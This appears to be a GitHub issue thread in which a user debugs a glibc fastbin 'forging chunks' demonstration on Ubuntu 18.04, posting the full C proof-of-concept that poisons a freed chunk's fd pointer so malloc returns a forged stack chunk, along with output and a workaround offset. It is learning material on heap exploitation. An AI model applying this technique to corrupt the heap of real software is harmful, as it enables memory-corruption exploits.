forging chunk issues

[tregua87]

Hi! I am trying "forging chunks" in a x64 machine, Ubuntu 18.04.2 LTS.

This is the code I am execution + some printf for debug.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

  struct forged_chunk {
    size_t prev_size;
    size_t size;
    struct forged_chunk *fd;
    struct forged_chunk *bck;
    char buf[10];               // padding
  };

  // First grab a fast chunk
  char *a = malloc(10);               // 'a' points to 0x219c010

  printf("a: %p\n", a);

  // Create a forged chunk
  struct forged_chunk chunk;    // At address 0x7ffc6de96690
  printf("chunk: %p\n", &chunk);
  chunk.size = 0x20;            // This size should fall in the same fastbin
  char* data = (char *)&chunk.fd;     // Data starts here for an allocated chunk
  strcpy(data, "attacker's data");
  printf("data %p\n", data);

  // Put the fast chunk back into fastbin
  free(a);
  // Modify 'fd' pointer of 'a' to point to our forged chunk
  *((unsigned long long *)a) = (unsigned long long)&chunk;
  // Remove 'a' from HEAD of fastbin
  // Our forged chunk will now be at the HEAD of fastbin
  char* aa = malloc(10);                   // Will return 0x219c010
  printf("aa: %p\n", aa);

  char* victim = malloc(10);          // Points to 0x7ffc6de966a0
  printf("victim: %p\n", &victim);
  printf("%s\n", victim);       // Prints "attacker's data" !!

  return 0;
}

While this is the optput:

a: 0x5646ebdb2260
chunk: 0x7ffff376dff0
data 0x7ffff376e000
aa: 0x5646ebdb2260
victim: 0x7ffff376dfd0
�

But the victim address is not aligned as expected.

Do you have any idea?

[tregua87]

I tried also __attribute__((packed)); to avoid padding. But I get same result

[tregua87]

In the end of the day I figured out to run it in this way:

char* data = (char *)&chunk.fd-0x10;     // Data starts here for an

stil, why? :D